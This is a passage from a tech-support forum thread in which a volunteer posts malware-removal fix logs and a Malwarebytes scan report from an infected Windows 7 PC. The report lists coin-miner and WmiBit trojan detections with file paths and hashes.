"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0CA8ECB-D919-4545-AF78-12493EE2D0DB}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0CA8ECB-D919-4545-AF78-12493EE2D0DB}" => removed successfully
C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1250379553-2428740185-3603661230-1000" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E374BBA4-EB46-4781-AF08-529748B61381}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E374BBA4-EB46-4781-AF08-529748B61381}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\StartRecording => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\StartRecording" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E3E9FED2-6ED8-4C53-B7D7-8011E13B7949}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E3E9FED2-6ED8-4C53-B7D7-8011E13B7949}" => removed successfully
C:\Windows\System32\Tasks\RecoveryCDWin7 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RecoveryCDWin7" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EB21D51D-6372-4112-BA3A-8C465667B9D7}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EB21D51D-6372-4112-BA3A-8C465667B9D7}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\DispatchRecoveryTasks" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{ED218DFE-D778-4991-AA1F-58CC4A678280}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{ED218DFE-D778-4991-AA1F-58CC4A678280}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\InstallPlayReady" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F197CC66-BBE6-48B8-A8FC-73595165CA95}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F197CC66-BBE6-48B8-A8FC-73595165CA95}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\OCURActivate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F7430C5F-32A2-44D7-8618-ACC01D88C2F0}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F7430C5F-32A2-44D7-8618-ACC01D88C2F0}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\mcupdate_scheduled" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F8C2130E-A883-46E4-81C7-3F4E090DA514}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F8C2130E-A883-46E4-81C7-3F4E090DA514}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Media Center\mcupdate => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center\mcupdate" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1}" => not found
C:\Windows\System32\Tasks\Mysa1 => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa1" => removed successfully
"C:\Windows\Tasks\MySearchDial.job" => not found
"C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job" => not found
"HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy" => removed successfully
HKLM\SOFTWARE\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => not found
HKLM\System\CurrentControlSet\Services\ehRecvr => removed successfully
ehRecvr => service removed successfully
HKLM\System\CurrentControlSet\Services\ehSched => removed successfully
ehSched => service removed successfully
HKLM\System\CurrentControlSet\Services\McAPExe => removed successfully
McAPExe => service removed successfully
HKLM\System\CurrentControlSet\Services\mccspsvc => removed successfully
mccspsvc => service removed successfully
HKLM\System\CurrentControlSet\Services\mfefire => removed successfully
mfefire => service removed successfully
HKLM\System\CurrentControlSet\Services\mfemms => removed successfully
mfemms => service removed successfully
HKLM\System\CurrentControlSet\Services\ModuleCoreService => removed successfully
ModuleCoreService => service removed successfully
HKLM\System\CurrentControlSet\Services\MsF928BDEEApp => removed successfully
MsF928BDEEApp => service removed successfully
HKLM\System\CurrentControlSet\Services\mssecsvc2.0 => removed successfully
mssecsvc2.0 => service removed successfully
HKLM\System\CurrentControlSet\Services\mssecsvc2.1 => removed successfully
mssecsvc2.1 => service removed successfully
HKLM\System\CurrentControlSet\Services\PEFService => removed successfully
PEFService => service removed successfully
HKLM\System\CurrentControlSet\Services\MBAMSwissArmy => could not remove, key could be protected
HKLM\System\CurrentControlSet\Services\vzandnetdiag => removed successfully
vzandnetdiag => service removed successfully
HKLM\System\CurrentControlSet\Services\vzandnetdiag2 => removed successfully
vzandnetdiag2 => service removed successfully
HKLM\System\CurrentControlSet\Services\vzandnetmodem => removed successfully
vzandnetmodem => service removed successfully
HKLM\System\CurrentControlSet\Services\vzandnetndis => removed successfully
vzandnetndis => service removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MSSE => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\Offline Files => removed successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft..../?LinkId=69157"=> value restored successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{D3D233D5-9F6D-436C-B6C7-E63F77503B30}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{575bddf5-790a-4d01-a37d-2863dec1c085}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\URLSearchHooks\\{D3D233D5-9F6D-436C-B6C7-E63F77503B30}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\URLSearchHooks\\{575bddf5-790a-4d01-a37d-2863dec1c085}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\URLSearchHooks\\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\URLSearchHooks\\{8a7d2060-824d-4b17-b00a-759b1b5f30d9}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\URLSearchHooks\\{26842a09-ffa8-4e2c-ae12-0c80f01c3295}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\URLSearchHooks\\{D3D233D5-9F6D-436C-B6C7-E63F77503B30}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\URLSearchHooks\\{575bddf5-790a-4d01-a37d-2863dec1c085}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\URLSearchHooks\\{81017EA9-9AA8-4A6A-9734-7AF40E7D593F}" => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => not found
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8} => not found
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C7BEFF53-0739-431F-893F-63670C6CE2F8} => removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D2539E59-E453-4A9D-B465-200A7C22E0B5} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b0441a0e-a49a-4e16-afc1-74ecced1921f} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{C7BEFF53-0739-431F-893F-63670C6CE2F8} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D2539E59-E453-4A9D-B465-200A7C22E0B5} => removed successfully
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4937BE7D-D79B-4503-916B-57CD4454756C} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{786CACE0-4B52-4B5E-9B22-4A8063236C63} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AADC8CF6-CE83-45D8-8B4C-5C9D3E393460} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BE8412CE-D220-4DA3-8A9F-1431ECED16DD} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C04B7D22-5AEC-4561-8F49-27F6269208F6} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C7BEFF53-0739-431F-893F-63670C6CE2F8} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D2539E59-E453-4A9D-B465-200A7C22E0B5} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{786CACE0-4B52-4B5E-9B22-4A8063236C63} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{7E61AF70-4BD4-4DBE-94F6-5E1B8E2439C9} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{C7BEFF53-0739-431F-893F-63670C6CE2F8} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{cca2e567-1987-4100-a3c6-5b4267084510} => not found
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D2539E59-E453-4A9D-B465-200A7C22E0B5} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D9EDB55B-B082-4361-B3FE-E16541CB7E88} => removed successfully
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F48980A0-589B-49F1-A35C-E7FF0B3C1B87} => not found
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\Software\Classes\CLSID\{DBC80044-A445-435b-BC74-9C25C1C588A9} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{66516A07-F617-488A-90CF-4E690CFB3C5F} => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{66516A07-F617-488A-90CF-4E690CFB3C5F} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => not found
HKLM\Software\Wow6432Node\Classes\CLSID\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} => removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D0C21091-FF8E-432C-9006-0540E81BA9D7} => not found
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD} => not found
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{311B58DC-A4DC-4B04-B1B5-60299AD3D803}" => removed successfully
HKLM\Software\Wow6432Node\Classes\CLSID\{311B58DC-A4DC-4B04-B1B5-60299AD3D803} => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{3004627E-F8E9-4E8B-909D-316753CBA923}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D7E97865-918F-41E4-9CD0-25AB1C574CE8}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D4027C7F-154A-4066-A1AD-4243D8127440}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{575BDDF5-790A-4D01-A37D-2863DEC1C085}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D4027C7F-154A-4066-A1AD-4243D8127440}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D7E97865-918F-41E4-9CD0-25AB1C574CE8}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{575BDDF5-790A-4D01-A37D-2863DEC1C085}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D4027C7F-154A-4066-A1AD-4243D8127440}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A0154E07-2B48-475C-A82A-80EFD84EA33E}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{364EA597-E728-4CE4-BB4A-ED846EF47970}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}" => removed successfully
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{D7E97865-918F-41E4-9CD0-25AB1C574CE8}" => not found
"HKU\S-1-5-21-1250379553-2428740185-3603661230-501\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{575BDDF5-790A-4D01-A37D-2863DEC1C085}" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= netsh int ip reset =========

Reseting Global, OK!
Reseting Interface, OK!
Restart the computer to complete this action.


========= End of CMD: =========


========= ipconfig /flushDNS =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


=========== "C:\Windows\Temp\*.*" ==========

C:\Windows\Temp\ntuser.dat => moved successfully

========= End -> "C:\Windows\Temp\*.*" ========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7739295 B
Java, Flash, Steam htmlcache => 1319 B
Windows/system/drivers => 3628 B
Edge => 0 B
Brave => 12887481 B
Firefox => 29490248 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 66228 B
ProgramData => 66228 B
systemprofile => 1843025 B
systemprofile32 => 153603080 B
LocalService => 153735324 B
NetworkService => 153801552 B
Marilyn => 285450887 B
lindag => 549821882 B
Jay => 555752378 B
Administrator.Marilyn-HP => 665358679 B
Guest => 750041627 B

RecycleBin => 372673 B
EmptyTemp: => 3.1 GB temporary data Removed.

================================

conhoy.exe is back in C:\Windows\temp so that virus is still alive.


Edited by Ztruker, 28 March 2022 - 08:07 PM.

Rich
 

Die with memories, not dreams. – Unknown


#12 Ztruker

Ztruker

    WTT Technical Elder

  • Tech Team
  • 8,292 posts
  • Interests:Helping people fix MS Windows related computer problems of all kinds.

    Waking each morning to see the green side of the Earth!

Posted 28 March 2022 - 08:24 PM

If you want me to run Malwarebytes again I need to boot to Safe mode and reinstall it and run it from there. As soon as I boot normally it gets deleted (or it did before).

 

Here is the scan results, I let Malwarebytes Quarantine everything then restart.

 

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 3/28/22
Scan Time: 10:28 PM
Log File: dfefd31c-af07-11ec-b3ef-60eb6909b7df.json

-Software Information-
Version: 4.5.2.157
Components Version: 1.0.1562
Update Package Version: 1.0.52976
License: Trial

-System Information-
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Marilyn-HP\Administrator

-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 373832
Threats Detected: 29
Threats Quarantined: 0
Time Elapsed: 13 min, 48 sec

-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 12
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BF7E80D7-1C8A-4FF9-B5A4-ECC0E68F42FC}, No Action By User, 896, 770537, 1.0.52976, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{E6152256-F4C2-4EE0-907F-81E0C608B982}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{E6152256-F4C2-4EE0-907F-81E0C608B982}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa1, No Action By User, 5602, 430785, 1.0.52976, , ame, , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A056D851-C054-4C2F-B75D-9596B97378B6}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\BOOT\{A056D851-C054-4C2F-B75D-9596B97378B6}, No Action By User, 5602, 430785, , , , , ,
Trojan.Agent.WmiBit, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Mysa2, No Action By User, 5602, 430785, 1.0.52976, , ame, , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4DBF4C71-A6EA-4D2B-8741-2FA477156F06}, No Action By User, 3644, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{4DBF4C71-A6EA-4D2B-8741-2FA477156F06}, No Action By User, 3644, 417162, , , , , ,
Trojan.Agent.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ok, No Action By User, 3644, 417162, 1.0.52976, , ame, , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{BF7E80D7-1C8A-4FF9-B5A4-ECC0E68F42FC}, No Action By User, 896, 770539, , , , , ,
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\oka, No Action By User, 896, 770539, 1.0.52976, , ame, , ,


Registry Value: 3
RiskWare.BitCoinMiner, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BF7E80D7-1C8A-4FF9-B5A4-ECC0E68F42FC}|PATH, No Action By User, 896, 770537, 1.0.52976, , ame, , ,
PUP.Optional.PCKeeper, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|PCKEEPERLIVE, No Action By User, 1332, 260399, 1.0.52976, , ame, , ,
PUP.Optional.AppGraffiti, HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|AGUPDATE, No Action By User, 1006, 235494, 1.0.52976, , ame, , ,

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET, No Action By User, 3714, 862122, 1.0.52976, , ame, , ,

File: 10
Backdoor.ForShare.WmiBit, C:\WINDOWS\DEBUG\ITEM.DAT, No Action By User, 5821, 430781, 1.0.52976, 2B1C66581342EDE26011C68B, dds, 01703524, BDFA523E5A06C417E30F0DAECB6215F3, 1E8441F0D32D3854E0B3801063F6015A9F09637D77B714F8E58FB8C198693A51
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA1, No Action By User, 5602, 430785, , , , , D1E5CD80A41238F760C118817A986B91, 9E0701CE591BE89D89B5C7E72151824785C1C68EC7A975B12CAE07646E099EC9
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET\CONFIG.JSON, No Action By User, 3714, 862122, 1.0.52976, , ame, , A1DBFEE625D809262093BE374C2C1F7D, C8559D6211D8115AD1DDC6A460E6A83BC85C2D52A145CB4363FD1F5FF6BE904A
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\lsma22.exe, No Action By User, 3714, 862122, , , , , D6F8C66D27FA8D4172399AFBFBCE6975, BA1E190E87D89FF7943CCA039F357CA8E7C37255D51ACCF49393E2F9119DEC04
Trojan.BitCoinMiner.E, C:\Windows\inf\aspnet\WinRing0x64.sys, No Action By User, 3714, 862122, , , , , 0C0195C48B6B8582FA6F6373032118DA, 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Trojan.Agent.WmiBit, C:\WINDOWS\SYSTEM32\TASKS\MYSA2, No Action By User, 5602, 430785, , , , , C15146D9061B44C56A309E20B0784F8E, F2929A3476C5B96D3C65CE2D2ED9377A25A16576759AA671F011D63FA47107FB
Trojan.Agent.Generic, C:\WINDOWS\SYSTEM32\TASKS\OK, No Action By User, 3644, 417162, , , , , B39F24B2BBB955D5B1BCEA48F6360B82, DB25348B01DF8C953EDAC34A761282BBEC72F22DE3D93027942A9DFC7B57AEE7
RiskWare.BitCoinMiner, C:\WINDOWS\SYSTEM32\TASKS\OKA, No Action By User, 896, 770539, , , , , 5478B777657918E39383D00D381A2EFA, 7D29AF1EDBC0044585BE2E5C147A34929D0103847AEABBF221C305201B9793DE
Trojan.MalPack.UPX, C:\WINDOWS\TEMP\CONHOY.EXE, No Action By User, 7156, 858908, 1.0.52976, EF5058CCC8725A5C802E0BD8, dds, 01703524, A4FDD182C052C420520377E94442376D, 8B7963CB577113F618ED39F5D2F13BBDC34A5000B454B3FEA6082F0C828EE683
